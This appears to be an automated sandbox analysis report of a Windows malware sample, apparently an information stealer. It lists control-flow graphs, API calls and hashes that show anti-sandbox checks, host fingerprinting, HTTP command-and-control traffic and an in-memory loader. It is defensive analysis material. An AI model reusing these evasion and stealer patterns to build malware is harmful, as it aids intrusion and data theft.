                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                    • StrCmpCA.SHLWAPI(?,024E9120), ref: 00406303
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                    • HttpOpenRequestA.WININET(00000000,GET,?,024ECDB8,00000000,00000000,00400100,00000000), ref: 00406385
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                    • InternetCloseHandle.WININET(00000000), ref: 004064EF
                    • InternetCloseHandle.WININET(00000000), ref: 004064F9
                    • InternetCloseHandle.WININET(00000000), ref: 00406503
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID: ERROR$ERROR$GET
                    • API String ID: 3074848878-2509457195
                    • Opcode ID: 3fba3590e5f709bd923487789c072cec83f09d76feea2036fce262c75db160c0
                    • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                    • Opcode Fuzzy Hash: 3fba3590e5f709bd923487789c072cec83f09d76feea2036fce262c75db160c0
                    • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1056 4117a0-4117cd call 41aad0 StrCmpCA 1059 4117d7-4117f1 call 41aad0 strtok_s 1056->1059 1060 4117cf-4117d1 ExitProcess 1056->1060 1063 4117f4-4117f8 1059->1063 1064 4119c2-4119cd call 41a800 1063->1064 1065 4117fe-411811 1063->1065 1067 411817-41181a 1065->1067 1068 41199e-4119bd strtok_s 1065->1068 1070 411821-411830 call 41a820 1067->1070 1071 411849-411858 call 41a820 1067->1071 1072 4118ad-4118be StrCmpCA 1067->1072 1073 4118cf-4118e0 StrCmpCA 1067->1073 1074 41198f-411999 call 41a820 1067->1074 1075 4118f1-411902 StrCmpCA 1067->1075 1076 411951-411962 StrCmpCA 1067->1076 1077 411970-411981 StrCmpCA 1067->1077 1078 411913-411924 StrCmpCA 1067->1078 1079 411932-411943 StrCmpCA 1067->1079 1080 411835-411844 call 41a820 1067->1080 1081 41185d-41186e StrCmpCA 1067->1081 1082 41187f-411890 StrCmpCA 1067->1082 1068->1063 1070->1068 1071->1068 1088 4118c0-4118c3 1072->1088 1089 4118ca 1072->1089 1090 4118e2-4118e5 1073->1090 1091 4118ec 1073->1091 1074->1068 1092 411904-411907 1075->1092 1093 41190e 1075->1093 1098 411964-411967 1076->1098 1099 41196e 1076->1099 1101 411983-411986 1077->1101 1102 41198d 1077->1102 1094 411930 1078->1094 1095 411926-411929 1078->1095 1096 411945-411948 1079->1096 1097 41194f 1079->1097 1080->1068 1084 411870-411873 1081->1084 1085 41187a 1081->1085 1086 411892-41189c 1082->1086 1087 41189e-4118a1 1082->1087 1084->1085 1085->1068 1106 4118a8 1086->1106 1087->1106 1088->1089 1089->1068 1090->1091 1091->1068 1092->1093 1093->1068 1094->1068 1095->1094 1096->1097 1097->1068 1098->1099 1099->1068 1101->1102 1102->1068 1106->1068
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcessstrtok_s
                    • String ID: block
                    • API String ID: 3407564107-2199623458
                    • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                    • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                    • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                    • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1109 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1125 41557c-415583 1109->1125 1126 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1125->1126 1127 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1125->1127 1143 4155bb-4155d2 call 41a8a0 call 41a800 1126->1143 1152 415693-4156a9 call 41aad0 StrCmpCA 1127->1152 1157 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1127->1157 1143->1152 1159 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1152->1159 1160 4156af-4156b6 1152->1160 1157->1152 1289 415ac3-415ac6 1159->1289 1163 4157da-41585f call 41aad0 StrCmpCA 1160->1163 1164 4156bc-4156c3 1160->1164 1183 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1163->1183 1184 415865-41586c 1163->1184 1168 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1164->1168 1169 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1164->1169 1168->1163 1169->1163 1269 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1169->1269 1183->1289 1190 415872-415879 1184->1190 1191 41598f-415a14 call 41aad0 StrCmpCA 1184->1191 1199 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1190->1199 1200 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1190->1200 1220 415a16-415a21 Sleep 1191->1220 1221 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1191->1221 1199->1191 1294 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1199->1294 1200->1191 1220->1125 1221->1289 1269->1163 1294->1191
                    APIs
                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024B6258,?,0042110C,?,00000000), ref: 0041A82B
                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                      • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                      • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                    • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen$Sleepstrtok
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3630751533-2791005934
                    • Opcode ID: ae78344d87fb29de376d8aed4e9a1f28d4e38cdf6b96ca29d5bba0b18dc789d6
                    • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                    • Opcode Fuzzy Hash: ae78344d87fb29de376d8aed4e9a1f28d4e38cdf6b96ca29d5bba0b18dc789d6
                    • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1320 417500-41754a GetWindowsDirectoryA 1321 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1320->1321 1322 41754c 1320->1322 1329 4175d8-4175df 1321->1329 1322->1321 1330 4175e1-4175fa call 418d00 1329->1330 1331 4175fc-417617 GetProcessHeap HeapAlloc 1329->1331 1330->1329 1333 417619-417626 call 41a740 1331->1333 1334 417628-417658 wsprintfA call 41a740 1331->1334 1341 41767e-41768e 1333->1341 1334->1341
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                    • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                    • wsprintfA.USER32 ref: 00417640
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\
                    • API String ID: 3790021787-3809124531
                    • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                    • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                    • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                    • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1342 40a003c-40a0047 1343 40a0049 1342->1343 1344 40a004c-40a0263 call 40a0a3f call 40a0e0f call 40a0d90 VirtualAlloc 1342->1344 1343->1344 1359 40a028b-40a0292 1344->1359 1360 40a0265-40a0289 call 40a0a69 1344->1360 1361 40a02a1-40a02b0 1359->1361 1364 40a02ce-40a03c2 VirtualProtect call 40a0cce call 40a0ce7 1360->1364 1361->1364 1365 40a02b2-40a02cc 1361->1365 1371 40a03d1-40a03e0 1364->1371 1365->1361 1372 40a0439-40a04b8 VirtualFree 1371->1372 1373 40a03e2-40a0437 call 40a0ce7 1371->1373 1374 40a04be-40a04cd 1372->1374 1375 40a05f4-40a05fe 1372->1375 1373->1371 1377 40a04d3-40a04dd 1374->1377 1378 40a077f-40a0789 1375->1378 1379 40a0604-40a060d 1375->1379 1377->1375 1383 40a04e3-40a0505 LoadLibraryA 1377->1383 1381 40a078b-40a07a3 1378->1381 1382 40a07a6-40a07b0 1378->1382 1379->1378 1384 40a0613-40a0637 1379->1384 1381->1382 1386 40a086e-40a08be LoadLibraryA 1382->1386 1387 40a07b6-40a07cb 1382->1387 1388 40a0517-40a0520 1383->1388 1389 40a0507-40a0515 1383->1389 1390 40a063e-40a0648 1384->1390 1394 40a08c7-40a08f9 1386->1394 1391 40a07d2-40a07d5 1387->1391 1392 40a0526-40a0547 1388->1392 1389->1392 1390->1378 1393 40a064e-40a065a 1390->1393 1395 40a07d7-40a07e0 1391->1395 1396 40a0824-40a0833 1391->1396 1397 40a054d-40a0550 1392->1397 1393->1378 1398 40a0660-40a066a 1393->1398 1399 40a08fb-40a0901 1394->1399 1400 40a0902-40a091d 1394->1400 1401 40a07e2 1395->1401 1402 40a07e4-40a0822 1395->1402 1406 40a0839-40a083c 1396->1406 1403 40a05e0-40a05ef 1397->1403 1404 40a0556-40a056b 1397->1404 1405 40a067a-40a0689 1398->1405 1399->1400 1401->1396 1402->1391 1403->1377 1407 40a056f-40a057a 1404->1407 1408 40a056d 1404->1408 1409 40a068f-40a06b2 1405->1409 1410 40a0750-40a077a 1405->1410 1406->1386 1411 40a083e-40a0847 1406->1411 1413 40a059b-40a05bb 1407->1413 1414 40a057c-40a0599 1407->1414 1408->1403 1415 40a06ef-40a06fc 1409->1415 1416 40a06b4-40a06ed 1409->1416 1410->1390 1417 40a084b-40a086c 1411->1417 1418 40a0849 1411->1418 1425 40a05bd-40a05db 1413->1425 1414->1425 1419 40a074b 1415->1419 1420 40a06fe-40a0748 1415->1420 1416->1415 1417->1406 1418->1386 1419->1405 1420->1419 1425->1397
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 040A024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: c4baa1a36c1c88623e039b4033ffd85db8839454ea71c4ae51a53c35e0e006b6
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: 2E526B74A01229DFDB64CFA8C984BACBBB1BF09304F1480D9E54DAB351DB30AA95DF15

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024BC9B0), ref: 004198A1
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024BC998), ref: 004198BA
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024BC968), ref: 004198D2
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024BC8C0), ref: 004198EA
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024BCBC0), ref: 00419903
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024B6278), ref: 0041991B
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024B4D00), ref: 00419933
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024B4C40), ref: 0041994C
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024BCAE8), ref: 00419964
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024BCB00), ref: 0041997C
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024BCD28), ref: 00419995
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024BCCF8), ref: 004199AD
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024B4D80), ref: 004199C5
                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,024BCDD0), ref: 004199DE
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                      • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                      • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                      • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                      • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                      • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                      • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                      • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                      • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                    • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                      • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                      • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                      • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                      • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                      • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                      • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                      • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,024B6258,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                    • Sleep.KERNEL32(00001770), ref: 00416B04
                    • CloseHandle.KERNEL32(?,00000000,?,024B6258,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                    • ExitProcess.KERNEL32 ref: 00416B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 3511611419-0
                    • Opcode ID: 777e6741428d29f3ac2eda15a5f9635963f388c94dd1b9800fe8626475fd4fd3
                    • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                    • Opcode Fuzzy Hash: 777e6741428d29f3ac2eda15a5f9635963f388c94dd1b9800fe8626475fd4fd3
                    • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                    Control-flow Graph

                    APIs
                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                    • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??2@$CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1683549937-4251816714
                    • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                    • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                    • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                    • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1491 401220-401247 call 4189b0 GlobalMemoryStatusEx 1494 401273-40127a 1491->1494 1495 401249-401271 call 41da00 * 2 1491->1495 1497 401281-401285 1494->1497 1495->1497 1499 401287 1497->1499 1500 40129a-40129d 1497->1500 1502 401292-401294 ExitProcess 1499->1502 1503 401289-401290 1499->1503 1503->1500 1503->1502
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                    • __aulldiv.LIBCMT ref: 00401258
                    • __aulldiv.LIBCMT ref: 00401266
                    • ExitProcess.KERNEL32 ref: 00401294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 3404098578-2766056989
                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                    • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                    • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1505 416af3 1506 416b0a 1505->1506 1508 416aba-416ad7 call 41aad0 OpenEventA 1506->1508 1509 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1506->1509 1515 416af5-416b04 CloseHandle Sleep 1508->1515 1516 416ad9-416af1 call 41aad0 CreateEventA 1508->1516 1515->1506 1516->1509
                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,024B6258,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                    • Sleep.KERNEL32(00001770), ref: 00416B04
                    • CloseHandle.KERNEL32(?,00000000,?,024B6258,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                    • ExitProcess.KERNEL32 ref: 00416B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                    • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                    • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                    • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                    APIs
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                      • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,024E9120), ref: 00406303
